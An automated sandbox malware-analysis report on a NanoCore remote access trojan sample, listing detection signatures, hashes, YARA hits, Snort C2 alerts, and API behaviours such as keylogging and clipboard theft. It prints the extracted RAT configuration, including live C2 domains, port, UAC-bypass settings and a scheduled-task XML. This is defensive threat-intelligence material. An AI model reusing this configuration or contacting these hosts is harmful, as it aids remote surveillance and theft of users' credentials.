Windows Analysis Report
P05jmXYKpr.exe

Overview

General Information

Sample Name:	P05jmXYKpr.exe
Original Sample Name:	db555a9de355c70681e2e5f9ed38a335.exe
Analysis ID:	877862
MD5:	db555a9de355c70681e2e5f9ed38a335
SHA1:	07534d5012526f6bdec5314a4d140de5d94672ea
SHA256:	fb25c8a64c09f9c4e8c586b94d5cda1dc69be203b786ea297f9293d7bd7b8b30
Tags:	exeNanoCoreRAT
Infos:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: NanoCore

Detected Nanocore Rat

Yara detected AntiVM autoit script

Antivirus detection for URL or domain

Yara detected Nanocore RAT

Snort IDS alert for network traffic

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Sigma detected: Scheduled temp file as task from temp location

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Starts an encoded Visual Basic Script (VBE)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Uses ipconfig to lookup or modify the Windows network settings

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses dynamic DNS services

Writes to foreign memory regions

Protects its processes via BreakOnTermination flag

Contains functionality to modify clipboard data

C2 URLs / IPs found in malware configuration

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to simulate keystroke presses

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

OS version to string mapping found (often used in BOTs)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

Contains functionality to query the security center for anti-virus and firewall products

Contains functionality to execute programs as a different user

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to communicate with device drivers

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

Installs a raw input device (often for capturing keystrokes)

File is packed with WinRar

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Contains functionality to launch a program with higher privileges

Potential key logger detected (key state polling based)

Contains functionality to simulate mouse events

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nanocore RAT, NanoCore	Nanocore is a Remote Access Tool used to steal credentials and to spy on cameras. It as been used for a while by numerous criminal actors as well as by nation state threat actors.	APT33 The Gorgon Group	https://assets.virustotal.com/reports/2021trends.pdf https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ https://blog.morphisec.com/syk-crypter-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore

Signatures

AV Detection

Antivirus detection for URL or domain

Source: december2nd.ddns.net	Avira URL Cloud: Label: malware
Source: december2n.duckdns.org	Avira URL Cloud: Label: malware

Yara detected Nanocore RAT

Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR

Found malware configuration

Source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "72ec1ea3-16bf-4e76-a7cf-15ed5e2a", "Group": "Marcello", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 61715, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

Multi AV Scanner detection for submitted file

Source: P05jmXYKpr.exe	ReversingLabs: Detection: 70%
Source: P05jmXYKpr.exe	Virustotal: Detection: 68%			Perma Link

Multi AV Scanner detection for domain / URL

Source: december2nd.ddns.net	Virustotal: Detection: 16%	Perma Link
Source: december2n.duckdns.org	Virustotal: Detection: 19%	Perma Link
Source: december2n.duckdns.org	Virustotal: Detection: 19%	Perma Link
Source: december2nd.ddns.net	Virustotal: Detection: 16%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

ReversingLabs: Detection: 52%

Uses 32bit PE files

Source: P05jmXYKpr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: P05jmXYKpr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: P05jmXYKpr.exe
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: RegSvcs.exe, 0000000D.00000003.467685686.0000000001C53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000D.00000000.419225570.0000000000D22000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe.7.dr, dhcpmon.exe.13.dr
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbj source: RegSvcs.exe, 0000000D.00000003.482399735.0000000001C53000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000003.467685686.0000000001C53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000D.00000000.419225570.0000000000D22000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe, 0000000D.00000002.634072543.0000000001BEA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe.7.dr, dhcpmon.exe.13.dr
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0095A69B
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0096C220
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0097B348 FindFirstFileExA,	0_2_0097B348
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002BE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	7_2_002BE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002BD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	7_2_002BD836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002CA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	7_2_002CA0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002CA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,	7_2_002CA488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C65F1 FindFirstFileW,FindNextFileW,FindClose,	7_2_002C65F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0028C642 FindFirstFileExW,	7_2_0028C642
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C7248 FindFirstFileW,FindClose,	7_2_002C7248
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	7_2_002C72E9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002BDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	7_2_002BDB69

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49699 -> 192.169.69.26:61715
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49700 -> 192.169.69.26:61715
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49701 -> 192.169.69.26:61715
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49702 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49702 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49703 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 212.193.30.230:61715 -> 192.168.2.3:49703
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49703 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49704 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49704 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49705 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49705 -> 212.193.30.230:61715

Uses dynamic DNS services

Source: unknown	DNS query: name: december2n.duckdns.org
Source: unknown	DNS query: name: december2nd.ddns.net

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: december2n.duckdns.org
Source: Malware configuration extractor	URLs: december2nd.ddns.net

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: SPD-NETTR SPD-NETTR
Source: Joe Sandbox View	ASN Name: WOWUS WOWUS

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 212.193.30.230 212.193.30.230
Source: Joe Sandbox View	IP Address: 212.193.30.230 212.193.30.230

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.3:49702 -> 212.193.30.230:61715

Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: P05jmXYKpr.exe, 00000000.00000003.381445625.0000000003082000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.381359513.0000000003080000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.380745820.0000000003080000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.com
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: P05jmXYKpr.exe, 00000000.00000003.381445625.0000000003082000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.381359513.0000000003080000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.380745820.0000000003080000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown

DNS traffic detected: queries for: december2n.duckdns.org

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002CD7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,

7_2_002CD7A1

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002CF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

7_2_002CF6C7

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002BA54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

7_2_002BA54A

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002CF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

7_2_002CF45C

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

7_2_002CF45C

Creates a DirectInput object (often for capturing keystrokes)

Source: boaliim.dat, 00000007.00000002.429505208.00000000017EA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Installs a raw input device (often for capturing keystrokes)

Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: RegisterRawInputDevices

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002E9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

7_2_002E9ED5

E-Banking Fraud

Yara detected Nanocore RAT

Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
